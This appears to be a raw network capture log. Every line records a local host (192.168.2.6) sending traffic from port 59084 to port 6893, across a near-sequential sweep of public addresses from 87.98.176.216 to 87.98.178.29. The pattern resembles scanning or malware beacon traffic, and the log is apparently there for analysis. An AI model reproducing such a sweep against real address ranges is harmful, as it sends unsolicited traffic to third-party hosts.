Sep 29, 2022 14:50:33.581478119 CEST	59084	6893	192.168.2.6	87.98.176.216
Sep 29, 2022 14:50:33.581659079 CEST	59084	6893	192.168.2.6	87.98.176.217
Sep 29, 2022 14:50:33.581754923 CEST	59084	6893	192.168.2.6	87.98.176.218
Sep 29, 2022 14:50:33.581913948 CEST	59084	6893	192.168.2.6	87.98.176.219
Sep 29, 2022 14:50:33.582052946 CEST	59084	6893	192.168.2.6	87.98.176.220
Sep 29, 2022 14:50:33.582180977 CEST	59084	6893	192.168.2.6	87.98.176.221
Sep 29, 2022 14:50:33.583561897 CEST	59084	6893	192.168.2.6	87.98.176.222
Sep 29, 2022 14:50:33.583723068 CEST	59084	6893	192.168.2.6	87.98.176.223
Sep 29, 2022 14:50:33.583862066 CEST	59084	6893	192.168.2.6	87.98.176.224
Sep 29, 2022 14:50:33.584001064 CEST	59084	6893	192.168.2.6	87.98.176.225
Sep 29, 2022 14:50:33.584186077 CEST	59084	6893	192.168.2.6	87.98.176.226
Sep 29, 2022 14:50:33.584322929 CEST	59084	6893	192.168.2.6	87.98.176.227
Sep 29, 2022 14:50:33.584445000 CEST	59084	6893	192.168.2.6	87.98.176.228
Sep 29, 2022 14:50:33.584604025 CEST	59084	6893	192.168.2.6	87.98.176.229
Sep 29, 2022 14:50:33.584722996 CEST	59084	6893	192.168.2.6	87.98.176.230
Sep 29, 2022 14:50:33.584837914 CEST	59084	6893	192.168.2.6	87.98.176.231
Sep 29, 2022 14:50:33.584894896 CEST	59084	6893	192.168.2.6	87.98.176.232
Sep 29, 2022 14:50:33.585026979 CEST	59084	6893	192.168.2.6	87.98.176.233
Sep 29, 2022 14:50:33.585136890 CEST	59084	6893	192.168.2.6	87.98.176.234
Sep 29, 2022 14:50:33.585277081 CEST	59084	6893	192.168.2.6	87.98.176.235
Sep 29, 2022 14:50:33.585450888 CEST	59084	6893	192.168.2.6	87.98.176.236
Sep 29, 2022 14:50:33.585583925 CEST	59084	6893	192.168.2.6	87.98.176.237
Sep 29, 2022 14:50:33.585743904 CEST	59084	6893	192.168.2.6	87.98.176.238
Sep 29, 2022 14:50:33.585867882 CEST	59084	6893	192.168.2.6	87.98.176.239
Sep 29, 2022 14:50:33.585988998 CEST	59084	6893	192.168.2.6	87.98.176.240
Sep 29, 2022 14:50:33.586119890 CEST	59084	6893	192.168.2.6	87.98.176.241
Sep 29, 2022 14:50:33.586232901 CEST	59084	6893	192.168.2.6	87.98.176.242
Sep 29, 2022 14:50:33.586374998 CEST	59084	6893	192.168.2.6	87.98.176.243
Sep 29, 2022 14:50:33.586482048 CEST	59084	6893	192.168.2.6	87.98.176.244
Sep 29, 2022 14:50:33.586618900 CEST	59084	6893	192.168.2.6	87.98.176.245
Sep 29, 2022 14:50:33.586740017 CEST	59084	6893	192.168.2.6	87.98.176.246
Sep 29, 2022 14:50:33.587235928 CEST	59084	6893	192.168.2.6	87.98.176.247
Sep 29, 2022 14:50:33.587374926 CEST	59084	6893	192.168.2.6	87.98.176.248
Sep 29, 2022 14:50:33.587619066 CEST	59084	6893	192.168.2.6	87.98.176.250
Sep 29, 2022 14:50:33.587645054 CEST	59084	6893	192.168.2.6	87.98.176.249
Sep 29, 2022 14:50:33.587766886 CEST	59084	6893	192.168.2.6	87.98.176.251
Sep 29, 2022 14:50:33.587934971 CEST	59084	6893	192.168.2.6	87.98.176.252
Sep 29, 2022 14:50:33.588057995 CEST	59084	6893	192.168.2.6	87.98.176.253
Sep 29, 2022 14:50:33.588206053 CEST	59084	6893	192.168.2.6	87.98.176.254
Sep 29, 2022 14:50:34.609883070 CEST	59084	6893	192.168.2.6	87.98.176.255
Sep 29, 2022 14:50:34.671322107 CEST	59084	6893	192.168.2.6	87.98.177.0
Sep 29, 2022 14:50:34.671463966 CEST	59084	6893	192.168.2.6	87.98.177.1
Sep 29, 2022 14:50:34.671577930 CEST	59084	6893	192.168.2.6	87.98.177.2
Sep 29, 2022 14:50:34.671714067 CEST	59084	6893	192.168.2.6	87.98.177.3
Sep 29, 2022 14:50:34.671951056 CEST	59084	6893	192.168.2.6	87.98.177.4
Sep 29, 2022 14:50:34.672007084 CEST	59084	6893	192.168.2.6	87.98.177.6
Sep 29, 2022 14:50:34.672040939 CEST	59084	6893	192.168.2.6	87.98.177.5
Sep 29, 2022 14:50:34.672074080 CEST	59084	6893	192.168.2.6	87.98.177.7
Sep 29, 2022 14:50:34.672173977 CEST	59084	6893	192.168.2.6	87.98.177.8
Sep 29, 2022 14:50:34.672259092 CEST	59084	6893	192.168.2.6	87.98.177.9
Sep 29, 2022 14:50:34.672358036 CEST	59084	6893	192.168.2.6	87.98.177.10
Sep 29, 2022 14:50:34.672441959 CEST	59084	6893	192.168.2.6	87.98.177.11
Sep 29, 2022 14:50:34.672600985 CEST	59084	6893	192.168.2.6	87.98.177.12
Sep 29, 2022 14:50:34.672606945 CEST	59084	6893	192.168.2.6	87.98.177.13
Sep 29, 2022 14:50:34.672802925 CEST	59084	6893	192.168.2.6	87.98.177.14
Sep 29, 2022 14:50:34.672894001 CEST	59084	6893	192.168.2.6	87.98.177.15
Sep 29, 2022 14:50:34.672979116 CEST	59084	6893	192.168.2.6	87.98.177.16
Sep 29, 2022 14:50:34.673135996 CEST	59084	6893	192.168.2.6	87.98.177.17
Sep 29, 2022 14:50:34.673289061 CEST	59084	6893	192.168.2.6	87.98.177.19
Sep 29, 2022 14:50:34.673398972 CEST	59084	6893	192.168.2.6	87.98.177.18
Sep 29, 2022 14:50:34.673403025 CEST	59084	6893	192.168.2.6	87.98.177.20
Sep 29, 2022 14:50:34.673508883 CEST	59084	6893	192.168.2.6	87.98.177.21
Sep 29, 2022 14:50:34.673600912 CEST	59084	6893	192.168.2.6	87.98.177.22
Sep 29, 2022 14:50:34.673693895 CEST	59084	6893	192.168.2.6	87.98.177.23
Sep 29, 2022 14:50:34.673763990 CEST	59084	6893	192.168.2.6	87.98.177.24
Sep 29, 2022 14:50:34.673832893 CEST	59084	6893	192.168.2.6	87.98.177.25
Sep 29, 2022 14:50:34.673927069 CEST	59084	6893	192.168.2.6	87.98.177.26
Sep 29, 2022 14:50:34.674020052 CEST	59084	6893	192.168.2.6	87.98.177.27
Sep 29, 2022 14:50:34.674206972 CEST	59084	6893	192.168.2.6	87.98.177.28
Sep 29, 2022 14:50:34.674319983 CEST	59084	6893	192.168.2.6	87.98.177.29
Sep 29, 2022 14:50:34.674449921 CEST	59084	6893	192.168.2.6	87.98.177.30
Sep 29, 2022 14:50:34.674555063 CEST	59084	6893	192.168.2.6	87.98.177.31
Sep 29, 2022 14:50:34.674732924 CEST	59084	6893	192.168.2.6	87.98.177.32
Sep 29, 2022 14:50:34.674854040 CEST	59084	6893	192.168.2.6	87.98.177.33
Sep 29, 2022 14:50:34.674933910 CEST	59084	6893	192.168.2.6	87.98.177.34
Sep 29, 2022 14:50:34.675077915 CEST	59084	6893	192.168.2.6	87.98.177.35
Sep 29, 2022 14:50:34.675133944 CEST	59084	6893	192.168.2.6	87.98.177.36
Sep 29, 2022 14:50:34.675236940 CEST	59084	6893	192.168.2.6	87.98.177.37
Sep 29, 2022 14:50:34.675350904 CEST	59084	6893	192.168.2.6	87.98.177.38
Sep 29, 2022 14:50:34.675415993 CEST	59084	6893	192.168.2.6	87.98.177.39
Sep 29, 2022 14:50:34.675483942 CEST	59084	6893	192.168.2.6	87.98.177.40
Sep 29, 2022 14:50:34.675646067 CEST	59084	6893	192.168.2.6	87.98.177.41
Sep 29, 2022 14:50:34.675697088 CEST	59084	6893	192.168.2.6	87.98.177.42
Sep 29, 2022 14:50:34.675781012 CEST	59084	6893	192.168.2.6	87.98.177.43
Sep 29, 2022 14:50:34.675976992 CEST	59084	6893	192.168.2.6	87.98.177.44
Sep 29, 2022 14:50:34.676044941 CEST	59084	6893	192.168.2.6	87.98.177.45
Sep 29, 2022 14:50:34.677536964 CEST	59084	6893	192.168.2.6	87.98.177.46
Sep 29, 2022 14:50:34.677710056 CEST	59084	6893	192.168.2.6	87.98.177.47
Sep 29, 2022 14:50:34.677862883 CEST	59084	6893	192.168.2.6	87.98.177.48
Sep 29, 2022 14:50:34.678026915 CEST	59084	6893	192.168.2.6	87.98.177.49
Sep 29, 2022 14:50:34.678194046 CEST	59084	6893	192.168.2.6	87.98.177.50
Sep 29, 2022 14:50:34.678286076 CEST	59084	6893	192.168.2.6	87.98.177.51
Sep 29, 2022 14:50:34.678375006 CEST	59084	6893	192.168.2.6	87.98.177.52
Sep 29, 2022 14:50:34.678502083 CEST	59084	6893	192.168.2.6	87.98.177.53
Sep 29, 2022 14:50:34.678592920 CEST	59084	6893	192.168.2.6	87.98.177.54
Sep 29, 2022 14:50:34.678678036 CEST	59084	6893	192.168.2.6	87.98.177.55
Sep 29, 2022 14:50:34.678752899 CEST	59084	6893	192.168.2.6	87.98.177.56
Sep 29, 2022 14:50:34.678857088 CEST	59084	6893	192.168.2.6	87.98.177.57
Sep 29, 2022 14:50:34.678936958 CEST	59084	6893	192.168.2.6	87.98.177.58
Sep 29, 2022 14:50:34.679033995 CEST	59084	6893	192.168.2.6	87.98.177.59
Sep 29, 2022 14:50:34.679183960 CEST	59084	6893	192.168.2.6	87.98.177.60
Sep 29, 2022 14:50:34.679267883 CEST	59084	6893	192.168.2.6	87.98.177.61
Sep 29, 2022 14:50:34.679352045 CEST	59084	6893	192.168.2.6	87.98.177.62
Sep 29, 2022 14:50:34.679469109 CEST	59084	6893	192.168.2.6	87.98.177.63
Sep 29, 2022 14:50:34.679572105 CEST	59084	6893	192.168.2.6	87.98.177.64
Sep 29, 2022 14:50:34.679653883 CEST	59084	6893	192.168.2.6	87.98.177.65
Sep 29, 2022 14:50:34.679754019 CEST	59084	6893	192.168.2.6	87.98.177.66
Sep 29, 2022 14:50:34.679929018 CEST	59084	6893	192.168.2.6	87.98.177.67
Sep 29, 2022 14:50:34.679956913 CEST	59084	6893	192.168.2.6	87.98.177.68
Sep 29, 2022 14:50:34.680016994 CEST	59084	6893	192.168.2.6	87.98.177.69
Sep 29, 2022 14:50:34.680134058 CEST	59084	6893	192.168.2.6	87.98.177.70
Sep 29, 2022 14:50:34.680229902 CEST	59084	6893	192.168.2.6	87.98.177.71
Sep 29, 2022 14:50:34.680316925 CEST	59084	6893	192.168.2.6	87.98.177.72
Sep 29, 2022 14:50:34.680433035 CEST	59084	6893	192.168.2.6	87.98.177.73
Sep 29, 2022 14:50:34.680497885 CEST	59084	6893	192.168.2.6	87.98.177.74
Sep 29, 2022 14:50:34.680615902 CEST	59084	6893	192.168.2.6	87.98.177.75
Sep 29, 2022 14:50:34.680881023 CEST	59084	6893	192.168.2.6	87.98.177.77
Sep 29, 2022 14:50:34.680896044 CEST	59084	6893	192.168.2.6	87.98.177.76
Sep 29, 2022 14:50:34.681014061 CEST	59084	6893	192.168.2.6	87.98.177.78
Sep 29, 2022 14:50:34.681132078 CEST	59084	6893	192.168.2.6	87.98.177.79
Sep 29, 2022 14:50:34.681255102 CEST	59084	6893	192.168.2.6	87.98.177.80
Sep 29, 2022 14:50:34.681317091 CEST	59084	6893	192.168.2.6	87.98.177.81
Sep 29, 2022 14:50:34.681499004 CEST	59084	6893	192.168.2.6	87.98.177.83
Sep 29, 2022 14:50:34.681631088 CEST	59084	6893	192.168.2.6	87.98.177.82
Sep 29, 2022 14:50:34.681659937 CEST	59084	6893	192.168.2.6	87.98.177.84
Sep 29, 2022 14:50:34.681724072 CEST	59084	6893	192.168.2.6	87.98.177.85
Sep 29, 2022 14:50:34.681777000 CEST	59084	6893	192.168.2.6	87.98.177.86
Sep 29, 2022 14:50:34.681896925 CEST	59084	6893	192.168.2.6	87.98.177.87
Sep 29, 2022 14:50:34.681997061 CEST	59084	6893	192.168.2.6	87.98.177.88
Sep 29, 2022 14:50:34.682091951 CEST	59084	6893	192.168.2.6	87.98.177.89
Sep 29, 2022 14:50:34.682194948 CEST	59084	6893	192.168.2.6	87.98.177.90
Sep 29, 2022 14:50:34.682306051 CEST	59084	6893	192.168.2.6	87.98.177.91
Sep 29, 2022 14:50:34.682396889 CEST	59084	6893	192.168.2.6	87.98.177.92
Sep 29, 2022 14:50:34.682535887 CEST	59084	6893	192.168.2.6	87.98.177.93
Sep 29, 2022 14:50:34.682622910 CEST	59084	6893	192.168.2.6	87.98.177.94
Sep 29, 2022 14:50:34.682759047 CEST	59084	6893	192.168.2.6	87.98.177.95
Sep 29, 2022 14:50:34.682818890 CEST	59084	6893	192.168.2.6	87.98.177.96
Sep 29, 2022 14:50:34.682914972 CEST	59084	6893	192.168.2.6	87.98.177.97
Sep 29, 2022 14:50:34.683018923 CEST	59084	6893	192.168.2.6	87.98.177.98
Sep 29, 2022 14:50:34.683171988 CEST	59084	6893	192.168.2.6	87.98.177.100
Sep 29, 2022 14:50:34.683353901 CEST	59084	6893	192.168.2.6	87.98.177.99
Sep 29, 2022 14:50:34.683423996 CEST	59084	6893	192.168.2.6	87.98.177.101
Sep 29, 2022 14:50:34.683552980 CEST	59084	6893	192.168.2.6	87.98.177.102
Sep 29, 2022 14:50:34.683650970 CEST	59084	6893	192.168.2.6	87.98.177.103
Sep 29, 2022 14:50:34.683753967 CEST	59084	6893	192.168.2.6	87.98.177.104
Sep 29, 2022 14:50:34.683881044 CEST	59084	6893	192.168.2.6	87.98.177.105
Sep 29, 2022 14:50:34.683959961 CEST	59084	6893	192.168.2.6	87.98.177.106
Sep 29, 2022 14:50:34.684026957 CEST	59084	6893	192.168.2.6	87.98.177.107
Sep 29, 2022 14:50:34.684146881 CEST	59084	6893	192.168.2.6	87.98.177.108
Sep 29, 2022 14:50:34.684215069 CEST	59084	6893	192.168.2.6	87.98.177.109
Sep 29, 2022 14:50:34.684324026 CEST	59084	6893	192.168.2.6	87.98.177.110
Sep 29, 2022 14:50:34.684390068 CEST	59084	6893	192.168.2.6	87.98.177.111
Sep 29, 2022 14:50:34.684546947 CEST	59084	6893	192.168.2.6	87.98.177.112
Sep 29, 2022 14:50:34.684708118 CEST	59084	6893	192.168.2.6	87.98.177.113
Sep 29, 2022 14:50:34.684824944 CEST	59084	6893	192.168.2.6	87.98.177.114
Sep 29, 2022 14:50:34.684916973 CEST	59084	6893	192.168.2.6	87.98.177.115
Sep 29, 2022 14:50:34.685008049 CEST	59084	6893	192.168.2.6	87.98.177.116
Sep 29, 2022 14:50:34.685070992 CEST	59084	6893	192.168.2.6	87.98.177.117
Sep 29, 2022 14:50:34.685162067 CEST	59084	6893	192.168.2.6	87.98.177.118
Sep 29, 2022 14:50:34.685246944 CEST	59084	6893	192.168.2.6	87.98.177.119
Sep 29, 2022 14:50:34.685311079 CEST	59084	6893	192.168.2.6	87.98.177.120
Sep 29, 2022 14:50:34.685405970 CEST	59084	6893	192.168.2.6	87.98.177.121
Sep 29, 2022 14:50:34.685506105 CEST	59084	6893	192.168.2.6	87.98.177.122
Sep 29, 2022 14:50:34.685581923 CEST	59084	6893	192.168.2.6	87.98.177.123
Sep 29, 2022 14:50:34.685695887 CEST	59084	6893	192.168.2.6	87.98.177.124
Sep 29, 2022 14:50:34.685791969 CEST	59084	6893	192.168.2.6	87.98.177.125
Sep 29, 2022 14:50:34.685868979 CEST	59084	6893	192.168.2.6	87.98.177.126
Sep 29, 2022 14:50:34.685976028 CEST	59084	6893	192.168.2.6	87.98.177.127
Sep 29, 2022 14:50:34.686053991 CEST	59084	6893	192.168.2.6	87.98.177.128
Sep 29, 2022 14:50:34.686230898 CEST	59084	6893	192.168.2.6	87.98.177.129
Sep 29, 2022 14:50:34.686238050 CEST	59084	6893	192.168.2.6	87.98.177.130
Sep 29, 2022 14:50:34.686321020 CEST	59084	6893	192.168.2.6	87.98.177.131
Sep 29, 2022 14:50:34.686402082 CEST	59084	6893	192.168.2.6	87.98.177.132
Sep 29, 2022 14:50:34.686492920 CEST	59084	6893	192.168.2.6	87.98.177.133
Sep 29, 2022 14:50:34.686568975 CEST	59084	6893	192.168.2.6	87.98.177.134
Sep 29, 2022 14:50:34.686674118 CEST	59084	6893	192.168.2.6	87.98.177.135
Sep 29, 2022 14:50:34.686822891 CEST	59084	6893	192.168.2.6	87.98.177.136
Sep 29, 2022 14:50:34.686889887 CEST	59084	6893	192.168.2.6	87.98.177.137
Sep 29, 2022 14:50:34.687012911 CEST	59084	6893	192.168.2.6	87.98.177.138
Sep 29, 2022 14:50:34.687180996 CEST	59084	6893	192.168.2.6	87.98.177.139
Sep 29, 2022 14:50:34.687262058 CEST	59084	6893	192.168.2.6	87.98.177.140
Sep 29, 2022 14:50:34.687324047 CEST	59084	6893	192.168.2.6	87.98.177.141
Sep 29, 2022 14:50:34.687433004 CEST	59084	6893	192.168.2.6	87.98.177.142
Sep 29, 2022 14:50:34.687525034 CEST	59084	6893	192.168.2.6	87.98.177.143
Sep 29, 2022 14:50:34.687680006 CEST	59084	6893	192.168.2.6	87.98.177.145
Sep 29, 2022 14:50:34.687787056 CEST	59084	6893	192.168.2.6	87.98.177.146
Sep 29, 2022 14:50:34.687854052 CEST	59084	6893	192.168.2.6	87.98.177.147
Sep 29, 2022 14:50:34.687947989 CEST	59084	6893	192.168.2.6	87.98.177.148
Sep 29, 2022 14:50:34.687997103 CEST	59084	6893	192.168.2.6	87.98.177.144
Sep 29, 2022 14:50:34.688060999 CEST	59084	6893	192.168.2.6	87.98.177.149
Sep 29, 2022 14:50:34.688122988 CEST	59084	6893	192.168.2.6	87.98.177.150
Sep 29, 2022 14:50:34.688290119 CEST	59084	6893	192.168.2.6	87.98.177.151
Sep 29, 2022 14:50:34.688405991 CEST	59084	6893	192.168.2.6	87.98.177.152
Sep 29, 2022 14:50:34.688519955 CEST	59084	6893	192.168.2.6	87.98.177.153
Sep 29, 2022 14:50:34.688647032 CEST	59084	6893	192.168.2.6	87.98.177.154
Sep 29, 2022 14:50:34.688766956 CEST	59084	6893	192.168.2.6	87.98.177.155
Sep 29, 2022 14:50:34.688867092 CEST	59084	6893	192.168.2.6	87.98.177.156
Sep 29, 2022 14:50:34.689018965 CEST	59084	6893	192.168.2.6	87.98.177.157
Sep 29, 2022 14:50:34.689111948 CEST	59084	6893	192.168.2.6	87.98.177.158
Sep 29, 2022 14:50:34.689261913 CEST	59084	6893	192.168.2.6	87.98.177.160
Sep 29, 2022 14:50:34.689353943 CEST	59084	6893	192.168.2.6	87.98.177.159
Sep 29, 2022 14:50:34.689354897 CEST	59084	6893	192.168.2.6	87.98.177.161
Sep 29, 2022 14:50:34.689450026 CEST	59084	6893	192.168.2.6	87.98.177.162
Sep 29, 2022 14:50:34.689620972 CEST	59084	6893	192.168.2.6	87.98.177.163
Sep 29, 2022 14:50:34.689740896 CEST	59084	6893	192.168.2.6	87.98.177.164
Sep 29, 2022 14:50:34.689851046 CEST	59084	6893	192.168.2.6	87.98.177.165
Sep 29, 2022 14:50:34.689946890 CEST	59084	6893	192.168.2.6	87.98.177.166
Sep 29, 2022 14:50:34.690067053 CEST	59084	6893	192.168.2.6	87.98.177.167
Sep 29, 2022 14:50:34.690179110 CEST	59084	6893	192.168.2.6	87.98.177.168
Sep 29, 2022 14:50:34.690303087 CEST	59084	6893	192.168.2.6	87.98.177.169
Sep 29, 2022 14:50:34.690388918 CEST	59084	6893	192.168.2.6	87.98.177.170
Sep 29, 2022 14:50:34.690484047 CEST	59084	6893	192.168.2.6	87.98.177.171
Sep 29, 2022 14:50:34.690577030 CEST	59084	6893	192.168.2.6	87.98.177.172
Sep 29, 2022 14:50:34.690670967 CEST	59084	6893	192.168.2.6	87.98.177.173
Sep 29, 2022 14:50:34.690823078 CEST	59084	6893	192.168.2.6	87.98.177.174
Sep 29, 2022 14:50:34.749485970 CEST	59084	6893	192.168.2.6	87.98.177.175
Sep 29, 2022 14:50:34.749594927 CEST	59084	6893	192.168.2.6	87.98.177.176
Sep 29, 2022 14:50:34.749794006 CEST	59084	6893	192.168.2.6	87.98.177.177
Sep 29, 2022 14:50:34.750053883 CEST	59084	6893	192.168.2.6	87.98.177.178
Sep 29, 2022 14:50:34.750133991 CEST	59084	6893	192.168.2.6	87.98.177.179
Sep 29, 2022 14:50:34.750231981 CEST	59084	6893	192.168.2.6	87.98.177.180
Sep 29, 2022 14:50:34.750336885 CEST	59084	6893	192.168.2.6	87.98.177.181
Sep 29, 2022 14:50:34.750444889 CEST	59084	6893	192.168.2.6	87.98.177.182
Sep 29, 2022 14:50:34.750574112 CEST	59084	6893	192.168.2.6	87.98.177.183
Sep 29, 2022 14:50:34.750648975 CEST	59084	6893	192.168.2.6	87.98.177.184
Sep 29, 2022 14:50:34.750691891 CEST	59084	6893	192.168.2.6	87.98.177.185
Sep 29, 2022 14:50:34.750778913 CEST	59084	6893	192.168.2.6	87.98.177.186
Sep 29, 2022 14:50:34.750957966 CEST	59084	6893	192.168.2.6	87.98.177.187
Sep 29, 2022 14:50:34.751038074 CEST	59084	6893	192.168.2.6	87.98.177.188
Sep 29, 2022 14:50:34.751230001 CEST	59084	6893	192.168.2.6	87.98.177.189
Sep 29, 2022 14:50:34.751264095 CEST	59084	6893	192.168.2.6	87.98.177.190
Sep 29, 2022 14:50:34.751395941 CEST	59084	6893	192.168.2.6	87.98.177.191
Sep 29, 2022 14:50:34.751446962 CEST	59084	6893	192.168.2.6	87.98.177.192
Sep 29, 2022 14:50:34.751579046 CEST	59084	6893	192.168.2.6	87.98.177.193
Sep 29, 2022 14:50:34.751632929 CEST	59084	6893	192.168.2.6	87.98.177.194
Sep 29, 2022 14:50:34.751718044 CEST	59084	6893	192.168.2.6	87.98.177.195
Sep 29, 2022 14:50:34.751811981 CEST	59084	6893	192.168.2.6	87.98.177.196
Sep 29, 2022 14:50:34.751940966 CEST	59084	6893	192.168.2.6	87.98.177.197
Sep 29, 2022 14:50:34.752064943 CEST	59084	6893	192.168.2.6	87.98.177.198
Sep 29, 2022 14:50:34.752129078 CEST	59084	6893	192.168.2.6	87.98.177.199
Sep 29, 2022 14:50:34.752213955 CEST	59084	6893	192.168.2.6	87.98.177.200
Sep 29, 2022 14:50:34.752396107 CEST	59084	6893	192.168.2.6	87.98.177.201
Sep 29, 2022 14:50:34.752441883 CEST	59084	6893	192.168.2.6	87.98.177.202
Sep 29, 2022 14:50:34.752531052 CEST	59084	6893	192.168.2.6	87.98.177.203
Sep 29, 2022 14:50:34.752626896 CEST	59084	6893	192.168.2.6	87.98.177.204
Sep 29, 2022 14:50:34.752710104 CEST	59084	6893	192.168.2.6	87.98.177.205
Sep 29, 2022 14:50:34.752800941 CEST	59084	6893	192.168.2.6	87.98.177.206
Sep 29, 2022 14:50:34.752877951 CEST	59084	6893	192.168.2.6	87.98.177.207
Sep 29, 2022 14:50:34.752979994 CEST	59084	6893	192.168.2.6	87.98.177.208
Sep 29, 2022 14:50:34.753055096 CEST	59084	6893	192.168.2.6	87.98.177.209
Sep 29, 2022 14:50:34.753149986 CEST	59084	6893	192.168.2.6	87.98.177.210
Sep 29, 2022 14:50:34.753246069 CEST	59084	6893	192.168.2.6	87.98.177.211
Sep 29, 2022 14:50:34.753382921 CEST	59084	6893	192.168.2.6	87.98.177.212
Sep 29, 2022 14:50:34.753489971 CEST	59084	6893	192.168.2.6	87.98.177.213
Sep 29, 2022 14:50:34.753604889 CEST	59084	6893	192.168.2.6	87.98.177.214
Sep 29, 2022 14:50:34.753693104 CEST	59084	6893	192.168.2.6	87.98.177.215
Sep 29, 2022 14:50:34.753770113 CEST	59084	6893	192.168.2.6	87.98.177.216
Sep 29, 2022 14:50:34.753863096 CEST	59084	6893	192.168.2.6	87.98.177.217
Sep 29, 2022 14:50:34.753948927 CEST	59084	6893	192.168.2.6	87.98.177.218
Sep 29, 2022 14:50:34.754034042 CEST	59084	6893	192.168.2.6	87.98.177.219
Sep 29, 2022 14:50:34.754120111 CEST	59084	6893	192.168.2.6	87.98.177.220
Sep 29, 2022 14:50:34.765779018 CEST	59084	6893	192.168.2.6	87.98.177.221
Sep 29, 2022 14:50:34.765935898 CEST	59084	6893	192.168.2.6	87.98.177.222
Sep 29, 2022 14:50:34.766244888 CEST	59084	6893	192.168.2.6	87.98.177.223
Sep 29, 2022 14:50:34.766398907 CEST	59084	6893	192.168.2.6	87.98.177.224
Sep 29, 2022 14:50:34.766496897 CEST	59084	6893	192.168.2.6	87.98.177.225
Sep 29, 2022 14:50:34.784626007 CEST	59084	6893	192.168.2.6	87.98.177.226
Sep 29, 2022 14:50:34.784869909 CEST	59084	6893	192.168.2.6	87.98.177.227
Sep 29, 2022 14:50:34.784940004 CEST	59084	6893	192.168.2.6	87.98.177.228
Sep 29, 2022 14:50:34.785044909 CEST	59084	6893	192.168.2.6	87.98.177.229
Sep 29, 2022 14:50:34.785162926 CEST	59084	6893	192.168.2.6	87.98.177.230
Sep 29, 2022 14:50:34.785288095 CEST	59084	6893	192.168.2.6	87.98.177.231
Sep 29, 2022 14:50:34.785387039 CEST	59084	6893	192.168.2.6	87.98.177.232
Sep 29, 2022 14:50:34.785480022 CEST	59084	6893	192.168.2.6	87.98.177.233
Sep 29, 2022 14:50:34.785985947 CEST	59084	6893	192.168.2.6	87.98.177.234
Sep 29, 2022 14:50:34.787214041 CEST	59084	6893	192.168.2.6	87.98.177.235
Sep 29, 2022 14:50:34.787556887 CEST	59084	6893	192.168.2.6	87.98.177.236
Sep 29, 2022 14:50:34.787739992 CEST	59084	6893	192.168.2.6	87.98.177.237
Sep 29, 2022 14:50:34.787883043 CEST	59084	6893	192.168.2.6	87.98.177.238
Sep 29, 2022 14:50:34.788031101 CEST	59084	6893	192.168.2.6	87.98.177.239
Sep 29, 2022 14:50:34.788096905 CEST	59084	6893	192.168.2.6	87.98.177.240
Sep 29, 2022 14:50:34.788207054 CEST	59084	6893	192.168.2.6	87.98.177.241
Sep 29, 2022 14:50:34.788322926 CEST	59084	6893	192.168.2.6	87.98.177.242
Sep 29, 2022 14:50:34.788454056 CEST	59084	6893	192.168.2.6	87.98.177.243
Sep 29, 2022 14:50:34.788667917 CEST	59084	6893	192.168.2.6	87.98.177.244
Sep 29, 2022 14:50:34.788775921 CEST	59084	6893	192.168.2.6	87.98.177.245
Sep 29, 2022 14:50:34.788907051 CEST	59084	6893	192.168.2.6	87.98.177.246
Sep 29, 2022 14:50:34.788980961 CEST	59084	6893	192.168.2.6	87.98.177.247
Sep 29, 2022 14:50:34.789036036 CEST	59084	6893	192.168.2.6	87.98.177.248
Sep 29, 2022 14:50:34.789148092 CEST	59084	6893	192.168.2.6	87.98.177.249
Sep 29, 2022 14:50:34.789227962 CEST	59084	6893	192.168.2.6	87.98.177.250
Sep 29, 2022 14:50:34.789381027 CEST	59084	6893	192.168.2.6	87.98.177.251
Sep 29, 2022 14:50:34.789467096 CEST	59084	6893	192.168.2.6	87.98.177.252
Sep 29, 2022 14:50:34.789591074 CEST	59084	6893	192.168.2.6	87.98.177.253
Sep 29, 2022 14:50:34.789705992 CEST	59084	6893	192.168.2.6	87.98.177.254
Sep 29, 2022 14:50:36.127841949 CEST	59084	6893	192.168.2.6	87.98.177.255
Sep 29, 2022 14:50:36.127964973 CEST	59084	6893	192.168.2.6	87.98.178.0
Sep 29, 2022 14:50:36.128061056 CEST	59084	6893	192.168.2.6	87.98.178.1
Sep 29, 2022 14:50:36.128140926 CEST	59084	6893	192.168.2.6	87.98.178.2
Sep 29, 2022 14:50:36.128228903 CEST	59084	6893	192.168.2.6	87.98.178.3
Sep 29, 2022 14:50:36.128376961 CEST	59084	6893	192.168.2.6	87.98.178.4
Sep 29, 2022 14:50:36.128503084 CEST	59084	6893	192.168.2.6	87.98.178.5
Sep 29, 2022 14:50:36.128710032 CEST	59084	6893	192.168.2.6	87.98.178.7
Sep 29, 2022 14:50:36.128817081 CEST	59084	6893	192.168.2.6	87.98.178.8
Sep 29, 2022 14:50:36.128920078 CEST	59084	6893	192.168.2.6	87.98.178.6
Sep 29, 2022 14:50:36.128920078 CEST	59084	6893	192.168.2.6	87.98.178.9
Sep 29, 2022 14:50:36.129000902 CEST	59084	6893	192.168.2.6	87.98.178.10
Sep 29, 2022 14:50:36.129108906 CEST	59084	6893	192.168.2.6	87.98.178.11
Sep 29, 2022 14:50:36.129245043 CEST	59084	6893	192.168.2.6	87.98.178.12
Sep 29, 2022 14:50:36.923193932 CEST	59084	6893	192.168.2.6	87.98.178.13
Sep 29, 2022 14:50:36.923348904 CEST	59084	6893	192.168.2.6	87.98.178.14
Sep 29, 2022 14:50:36.923643112 CEST	59084	6893	192.168.2.6	87.98.178.15
Sep 29, 2022 14:50:36.923743963 CEST	59084	6893	192.168.2.6	87.98.178.16
Sep 29, 2022 14:50:36.923851013 CEST	59084	6893	192.168.2.6	87.98.178.17
Sep 29, 2022 14:50:36.923968077 CEST	59084	6893	192.168.2.6	87.98.178.18
Sep 29, 2022 14:50:36.924248934 CEST	59084	6893	192.168.2.6	87.98.178.19
Sep 29, 2022 14:50:36.924415112 CEST	59084	6893	192.168.2.6	87.98.178.20
Sep 29, 2022 14:50:36.924555063 CEST	59084	6893	192.168.2.6	87.98.178.21
Sep 29, 2022 14:50:36.924838066 CEST	59084	6893	192.168.2.6	87.98.178.22
Sep 29, 2022 14:50:36.924978971 CEST	59084	6893	192.168.2.6	87.98.178.23
Sep 29, 2022 14:50:36.925113916 CEST	59084	6893	192.168.2.6	87.98.178.24
Sep 29, 2022 14:50:36.925250053 CEST	59084	6893	192.168.2.6	87.98.178.25
Sep 29, 2022 14:50:36.925558090 CEST	59084	6893	192.168.2.6	87.98.178.26
Sep 29, 2022 14:50:36.925664902 CEST	59084	6893	192.168.2.6	87.98.178.27
Sep 29, 2022 14:50:36.925797939 CEST	59084	6893	192.168.2.6	87.98.178.28
Sep 29, 2022 14:50:36.925949097 CEST	59084	6893	192.168.2.6	87.98.178.29
